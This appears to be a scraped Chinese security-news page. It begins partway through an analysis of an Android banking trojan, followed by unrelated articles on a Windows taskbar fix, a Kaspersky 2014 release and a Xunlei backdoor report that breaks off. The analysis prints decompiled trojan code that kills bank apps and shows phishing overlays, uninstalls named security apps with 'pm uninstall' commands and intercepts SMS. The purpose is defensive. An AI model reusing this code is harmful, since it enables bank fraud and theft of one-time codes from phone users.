localActivityManager.restartPackage(&quot;com.rytong.bankps&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cn.com.njcb.android.mobilebank&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cn.com.njcb.android.mobilebank&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.ecitic.bank.mobile&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.ecitic.bank.mobile&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.cebbank.bankebb&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.cebbank.bankebb&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cn.com.cmbc.mbank&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cn.com.cmbc.mbank&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cn.com.spdb.mobilebank.per&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cn.com.spdb.mobilebank.per&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.pingan.pabank.activity&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.pingan.pabank.activity&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.gzrcb.mobilebank&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.gzrcb.mobilebank&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cn.com.cqb.mobilebank.per&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cn.com.cqb.mobilebank.per&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.chinamworld.bocmbci&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.chinamworld.bocmbci&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.rytong.app.bankhx&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.rytong.app.bankhx&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.csii.huzhou.mobilebank&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.csii.huzhou.mobilebank&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cn.com.shbank.mper&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cn.com.shbank.mper&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.rytong.bankqd&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.rytong.bankqd&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.tlbank&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.tlbank&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.sookin.scyh&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.sookin.scyh&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cn.com.hzb.mobilebank.per&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cn.com.hzb.mobilebank.per&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.chinamworld.klb&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.chinamworld.klb&quot;);</p><p>}</p><p>if (str.contains(&quot;icbc&quot;))</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; Cursor localCursor27 = c.a(&quot;yh&quot;, new String[] { &quot;_id&quot;, &quot;mc&quot;, &quot;jilu&quot; }, &quot;mc=?&quot;, new String[] { &quot;gs&quot; }, null, null, null);</p><p>&nbsp; &nbsp; &nbsp; if ((localCursor27.moveToFirst()) &amp;&amp; (localCursor27.getInt(localCursor27.getColumnIndex(&quot;jilu&quot;)) == 0))</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.icbc&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent53 = new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent53.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent53.addCategory(&quot;android.intent.category.HOME&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent53);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent54 = new Intent(getApplicationContext(), gs.class);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent54.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent54);</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; }</p><p>&nbsp; &nbsp; if (str.contains(&quot;com.chinamworld.main&quot;))</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; Cursor localCursor26 = c.a(&quot;yh&quot;, new String[] { &quot;_id&quot;, &quot;mc&quot;, &quot;jilu&quot; }, &quot;mc=?&quot;, new String[] { &quot;js&quot; }, null, null, null);</p><p>&nbsp; &nbsp; &nbsp; if ((localCursor26.moveToFirst()) &amp;&amp; (localCursor26.getInt(localCursor26.getColumnIndex(&quot;jilu&quot;)) == 0))</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.chinamworld.main&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent51 = new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent51.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent51.addCategory(&quot;android.intent.category.HOME&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent51);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent52 = new Intent(getApplicationContext(), js.class);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent52.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent52);</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; }</p><p>&nbsp; &nbsp; if (str.contains(&quot;bankcomm&quot;))</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; Cursor localCursor25 = c.a(&quot;yh&quot;, new String[] { &quot;_id&quot;, &quot;mc&quot;, &quot;jilu&quot; }, &quot;mc=?&quot;, new String[] { &quot;jt&quot; }, null, null, null);</p><p>&nbsp; &nbsp; &nbsp; if ((localCursor25.moveToFirst()) &amp;&amp; (localCursor25.getInt(localCursor25.getColumnIndex(&quot;jilu&quot;)) == 0))</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.bankcomm&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent49 = new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent49.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent49.addCategory(&quot;android.intent.category.HOME&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent49);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent50 = new Intent(getApplicationContext(), jt.class);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent50.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent50);</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; }</p><p>&nbsp; &nbsp; if (str.contains(&quot;taobao&quot;))</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; Cursor localCursor24 = c.a(&quot;yh&quot;, new String[] { &quot;_id&quot;, &quot;mc&quot;, &quot;jilu&quot; }, &quot;mc=?&quot;, new String[] { &quot;tb&quot; }, null, null, null);</p><p>&nbsp; &nbsp; &nbsp; if ((localCursor24.moveToFirst()) &amp;&amp; (localCursor24.getInt(localCursor24.getColumnIndex(&quot;jilu&quot;)) == 0))</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.taobao.taobao&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent47 = new Intent(&quot;android.intent.action.MAIN&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent47.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent47.addCategory(&quot;android.intent.category.HOME&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent47);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Intent localIntent48 = new Intent(getApplicationContext(), tb.class);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localIntent48.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; startActivity(localIntent48);</p><p>&nbsp; &nbsp; &nbsp; }</p><p>// &nbsp;終止各銀行進程</p><p>查找安全軟件并卸載安全軟件<br/></p><p>for (g = &quot;Already root&quot;; ; g = &quot;NOroot&quot;)</p><p>&nbsp; &nbsp;{</p><p>&nbsp; &nbsp; &nbsp;this.C = 5;</p><p>&nbsp; &nbsp; &nbsp;this.E = 5;</p><p>&nbsp; &nbsp; &nbsp;this.B = new String[this.C];</p><p>&nbsp; &nbsp; &nbsp;this.D = new String[this.E];</p><p>&nbsp; &nbsp; &nbsp;this.B[0] = &quot;pm uninstall com.qihoo360.mobilesafe&quot;; &nbsp; &nbsp; //卸載360、騰訊、金山等相關的安全軟件</p><p>&nbsp; &nbsp; &nbsp;this.B[1] = &quot;pm uninstall com.tencent.qqpimsecure&quot;;&nbsp;</p><p>&nbsp; &nbsp; &nbsp;this.B[2] = &quot;pm uninstall com.ijinshan.mguard&quot;; &nbsp; &nbsp; &nbsp;&nbsp;</p><p>&nbsp; &nbsp; &nbsp;this.B[3] = &quot;pm uninstall com.ijinshan.duba&quot;; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</p><p>&nbsp; &nbsp; &nbsp;this.B[4] = &quot;pm uninstall com.anguanjia.safe&quot;;</p><p>&nbsp; &nbsp; &nbsp;this.D[0] = &quot;com.qihoo360.mobilesafe&quot;;</p><p>&nbsp; &nbsp; &nbsp;this.D[1] = &quot;com.tencent.qqpimsecure&quot;;</p><p>&nbsp; &nbsp; &nbsp;this.D[2] = &quot;com.ijinshan.mguard&quot;;</p><p>&nbsp; &nbsp; &nbsp;this.D[3] = &quot;com.ijinshan.duba&quot;;</p><p>&nbsp; &nbsp; &nbsp;this.D[4] = &quot;com.anguanjia.safe&quot;;</p><p>&nbsp; &nbsp; &nbsp;this.s = new o();</p><p>攔截相關短信:<br/></p><p>f (i5 == 1)</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ((server.f == 0) &amp;&amp; (server.a != i3))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, 1);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.b(this.a, i3);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; str4 = &quot;接收&quot;;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, new o());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; String str5 = server.d(this.a).a(this.a.getApplicationContext());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, new n());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.g(this.a).a(this.a.getApplicationContext(), str2, str1, str5);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(&quot;[ &quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(str1 + &quot;, &quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(i4 + &quot;, &quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(str2 + &quot;, &quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(str3 + &quot;, &quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(str4);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(&quot; ]\n\n&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (!localCursor1.isClosed())</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localCursor1.close();</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; &nbsp; while (true)</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(&quot;getSmsInPhone has executed!&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; super.onChange(paramBoolean);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; return;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; server.f = 0;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; break;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; if (i5 != 2)</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; if (server.b == i3)</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break label760;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Cursor localCursor2 = server.c.a(&quot;send&quot;, null, null, null, null, null, &quot;_id ASC&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; if (localCursor2.moveToFirst())</p><p>&nbsp; &nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localCursor2.getColumnIndex(&quot;_id&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int i6 = localCursor2.getColumnIndex(&quot;sSend&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; do</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, localCursor2.getString(i6));</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; while (localCursor2.moveToNext());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localCursor2.close();</p><p>&nbsp; &nbsp; &nbsp; &nbsp; if (server.h(this.a).equals(&quot;1&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, new o());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, new n());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; String str6 = server.d(this.a).a(this.a.getApplicationContext());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, str2 + &quot;;&quot; + str1, str6);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; &nbsp; &nbsp; server.b = i3;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; str4 = &quot;發送&quot;;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; break;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(&quot;no result!&quot;);</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; }</p><p>&nbsp; &nbsp; catch (SQLiteException localSQLiteException)</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; while (true)</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; continue;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; label760: String str4 = &quot;null&quot;;</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; }</p><p>&nbsp; }</p><p>}</p><p><strong>解密密鑰:</strong><br/></p><p>public void a()</p><p>&nbsp; {</p><p>&nbsp; &nbsp; try</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; InputStream localInputStream = getAssets().open(&quot;unhi.db&quot;); &nbsp; &nbsp; // 密鑰</p><p>&nbsp; &nbsp; &nbsp; FileOutputStream localFileOutputStream = new FileOutputStream(this.q + &quot;unhi.db&quot;);</p><p>&nbsp; &nbsp; &nbsp; byte[] arrayOfByte = new byte[1024];</p><p>&nbsp; &nbsp; &nbsp; while (true)</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; int i1 = localInputStream.read(arrayOfByte);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; if (i1 &lt;= 0)</p><p>&nbsp; &nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localFileOutputStream.flush();</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localFileOutputStream.close();</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localInputStream.close();</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localFileOutputStream.write(arrayOfByte, 0, i1);</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; }</p><p>&nbsp; &nbsp; catch (Exception localException)</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; }</p><p>&nbsp; }</p><p>&nbsp; public void a(String paramString)</p><p>&nbsp; {</p><p>&nbsp; &nbsp; if (!new File(paramString).exists())</p><p>&nbsp; &nbsp; &nbsp; a();</p><p>&nbsp; }</p><p>&nbsp; public void c()</p><p>&nbsp; {</p><p>&nbsp; &nbsp; new l(this).start();</p><p>&nbsp; }</p><p>&nbsp; public IBinder onBind(Intent paramIntent)</p><p>&nbsp; {</p><p>&nbsp; &nbsp; return null;</p><p>&nbsp; }</p><p>&nbsp; public void onCreate()</p><p>&nbsp; {</p><p>&nbsp; &nbsp; this.u = new e();</p><p>&nbsp; &nbsp; IntentFilter localIntentFilter = new IntentFilter(&quot;android.provider.Telephony.SMS_RECEIVED&quot;);</p><p>&nbsp; &nbsp; localIntentFilter.setPriority(2147483647);</p><p>&nbsp; &nbsp; registerReceiver(this.u, localIntentFilter);</p><p>&nbsp; &nbsp; p = (ActivityManager)getSystemService(&quot;activity&quot;);</p><p>&nbsp; &nbsp; this.F = 0;</p><p>this.j = false;</p><p>b(this.s.a(getApplicationContext()), &quot;201305:&quot; + g + &quot;;ver:&quot; + Build.VERSION.RELEASE + &quot;;Model:&quot; + Build.MODEL);</p><p>&nbsp; &nbsp; &nbsp; this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + &quot;/&quot;);</p><p>&nbsp; &nbsp; &nbsp; a(this.q + &quot;unhi.db&quot;);</p><p>&nbsp; &nbsp; &nbsp; c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + &quot;/unhi.db&quot;, null, 1);</p><p>&nbsp; &nbsp; &nbsp; m localm = new m(this, new Handler());</p><p>&nbsp; &nbsp; &nbsp; getContentResolver().registerContentObserver(Uri.parse(&quot;content://sms/&quot;), true, localm);</p><p>&nbsp; &nbsp; &nbsp; Intent localIntent = new Intent(getApplicationContext(), log.class);</p><p>&nbsp; &nbsp; &nbsp; localIntent.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; startService(localIntent);</p><p><br/><img src="https://pic.cr173.com/up/201403/091720_4171445548534.png"/>&nbsp;<br/><br/></p><p><strong>三、&nbsp;&nbsp;</strong><strong>總結</strong></p><p>該病毒嘗試著去卸載安全軟件;采用了加密技術,增加了分析難度;并隱藏運行界面,防止用戶察覺??梢钥闯鲆苿影踩珕栴}越演越烈,且手段越來越高明,增加了分析難度。</p><p>// 由于本人對于密碼學方面還沒有Hello World的水平,所以無法解密相關信息,水平有限。</p> [系統安全]W7任務欄打不開窗口怎么辦? http://www.pirinnaturalssoapandspa.com//html/28003_1.html 西西 系統安全 2014/3/13 14:07:20 <p>電腦任務欄不顯示打開的窗口,打開過很多任務。但是任務欄就是不顯示打開的項目,但是用TAB+ALT 或者任務管理器可以看到進程,這到底是為什么呢?本文就來給大家講解一下。</p><p>任務欄不顯示任務是什么原因?</p><p>出現這種情況一般是由于</p><p>一:桌面程序explorer.exe有問題</p><p>二:任務欄設置錯誤</p><p>三:任務欄故障</p><p align="center"><img src="https://pic.cr173.com/up/201403/140850_8884030997753.png"/></p><p>故障一及解決方法:</p><p>原因分析:任務欄設置問題</p><p>有一種情況是打開的窗口任務欄不顯示,包括任務欄也看不到。但是鼠標點擊過去又能正常顯示,這是因為設置了 任務欄自動隱藏導致的。</p><p>解決辦法:</p><p>在任務欄,右鍵,屬性,如下圖</p><p align="center"><img src="https://pic.cr173.com/up/201403/140927_4408338248729.png"/></p><p>解決步驟:</p><p>1.找到任務欄,右鍵“任務管理器”如果是XP系統直接輸入 ctrl+alt+t調出任務管理器</p><p align="center"><img src="https://pic.cr173.com/up/201403/141330_9945584952831.jpg"/></p><p>&nbsp;</p><p>找到“進程”選項卡---- 找到 explorer進程,點擊結束進程,并確定</p><p align="center"><img src="https://pic.cr173.com/up/201403/141225_6895642936229.png"/></p><p align="center"><img src="https://pic.cr173.com/up/201403/141513_2957318961620.png"/></p><p>新建explorer任務</p><p>然后點擊,新建任務,在任務新建打開選項輸入 explorer 確定即可,您在查看任務欄您會發現,之前打開的窗口又正?;謴土?lt;/p><p align="center"><img src="https://pic.cr173.com/up/201403/141652_7757245719432.png"/></p> [安全產品]卡巴斯基2014官方中文版發布、卡巴斯基2014免費版 http://www.pirinnaturalssoapandspa.com//html/22370_1.html 西西 安全產品 2013/8/24 10:02:16 <p>卡巴斯基2014系列是卡巴斯基實驗室的旗艦產品,能夠為個人計算機用戶提供抵御各類互聯網威脅的全面保護。近日,卡巴斯基官網正式放出了卡巴斯基反病毒軟件2014和卡巴斯基安全部隊2014的簡體中文版,大家可以下載30天試用版本進行體驗。<br /></p><p><strong>卡巴斯基反病毒軟件2014:</strong></p><p>主要功能:</p><p>——實時保護,抵御最新病毒、間諜軟件和更多網絡威脅</p><p>——主動檢測未知惡意軟件,回滾惡意行為</p><p>——快速安全檢查,查看文件和網站的安全性</p><p>——自動漏洞入侵防護確保漏洞不會造成計算機被感染</p><p>——網址顧問提示網頁鏈接信譽信息</p><p>——反鎖屏軟件,避免計算機被木馬鎖定</p><p>——反釣魚功能保護您的數字身份安全</p><p>——iChecker/iSwift 技術提供高性能的智能掃描</p><p>——智能更新減少網絡流量和資源使用</p><p>——游戲模式提供無打擾的游戲體驗</p><p>更新信息:</p><p>——支持最新版的常見網頁瀏覽器;</p><p>——新增反鎖屏軟件功能;</p><p>——反釣魚功能改進;</p><p>——已增強程序性能,并且優化了計算機資源消耗;</p><p>——新增在計算機空閑時限制活動的模式;</p><p>——增強程序圖形界面性能,減少了響應用戶操作的時間;</p><p>——改善了程序報告功能。</p><p><strong>卡巴斯基安全部隊2014:</strong></p><p>主要功能:</p><p>——完整的實時保護:通過整合云技術和高級PC 安全技術,卡巴斯基安全軟件能夠為用戶提供有效的針對惡意軟件和其他互聯網威脅的高效保護。</p><p>——抵御各種類型的惡意軟件:實時監控和分析潛在威脅,能夠在危險行為造成危害之前,完全將其攔截。</p><p>——安全沖浪:內嵌的網頁保護能夠對用戶通過PC 訪問的每個網站進行安全檢查,確保所訪問網站安全,不包含惡意軟件。</p><p>——保護在線交易安全:增強的在線交易保護能夠讓您安全無憂地通過PC 進行在線購物、使用在線銀行以及進行在線支付和轉賬。</p><p>——應用程序控制:受信任應用程序模式能夠限制在PC 上運行的程序,阻止未授權文件影響系統。</p><p>——保護數字身份安全:用戶能夠享受業內領先的反釣魚和反身份盜竊保護。</p><p>——保護家庭在線安全:利用上網管理功能,您可以讓孩子從互聯網獲益,同時遠離不良內容。</p><p>——保護用戶輸入內容:當用戶使用物理鍵盤輸入時,保護用戶的個人數據安全。使用無法探測的鼠標點擊進行輸入,還能夠避免鍵盤記錄器或截屏軟件攔截敏感信息。</p><p>——系統回滾功能:回滾惡意軟件行為對系統造成的影響。</p><p>——更強的保護:優化的性能:卡巴斯基軟件經過特別優化,在為用戶提供所需的安全保護的同時,不會拖慢PC 性能。</p><p>更新信息:</p><p>——新增ZETA盾;</p><p>——新增受信任應用程序模式;</p><p>——安全支付與反釣魚功能改進;</p><p>——上網管理功能改進;</p><p>——新增反鎖屏軟件功能;</p><p>——新增反鎖定程序功能;</p><p><span style="color:#ff0000;">30天試用版下載:</span></p><p>卡巴斯基反病毒:http://download.kaba365.com/kaspersky/2014/kav14.0.0.4651zh-Hans-cn.exe</p><p>卡巴斯基安全部隊:http://download.kaba365.com/kaspersky/2014/kis14.0.0.4651zh-Hans-cn.exe</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082410025650787.jpg" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082410025685906.jpg" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082410025666145.jpg" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082410025612732.jpg" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082410025766786.jpg" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082410025737275.jpg" alt="" /></p> [系統安全]瑞星發布迅雷InpEnhSvc.exe后門特征分析報告 http://www.pirinnaturalssoapandspa.com//html/22293_1.html 西西 系統安全 2013/8/22 10:23:02 <p>迅雷在不久前被曝產品內置后門,昨日迅雷官方對此消息進行了證實,稱其是員工私人行為。瑞星今日發布迅雷InpEnhSvc.exe后門分析報告InpEnhSvc.exe擁有典型的后門特征,相比于其它后門程序,該病毒側重于后臺應用推廣,包括PC應用和手機Android應用;其次病毒文件帶有正常的數字簽名。</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231781497.png" alt="" /></p><p>本報告主要分析了該后門的功能點,<span style="color:#ff0000;">InpEnhSvc主要有三個大功能點</span>:</p><p>后臺惡意推廣手機應用</p><p>常規的遠程控制操作</p><p>自動更新升級</p><p>功能點主要執行流程</p><p>病毒運行時,會創建一個隱藏的0大小的窗口,并注冊接收USB、DISK、COMPORT等硬件設備的更改通知,病毒通過接收遠程不同的功能號來執行相應的功能函數。</p><p><span style="color:#ff0000;">后臺惡意推廣手機應用</span></p><p>執行時會檢測常見的調試類軟件是否存在,存在的話就不執行后面的流程,檢測的調試類軟件包括procexp.exe、procmon.exe、windbg.exe等。</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231764408.png" alt="" /></p><p>檢測temp目錄下是否存在配置文件tools.ini,不存在的話就從conf.kklm.n0808.com下載得來,并通過配置文件的信息啟動相應的推廣更新等操作。</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231784169.png" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231765876.png" alt="" /></p><p>檢測temp目錄下是否存在adb等手機應用推廣工具,如不存在則下載。</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231845287.png" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231865049.png" alt="" /></p><p>注冊自身為word插件,隨word啟動而自動加載。</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231856241.png" alt="" 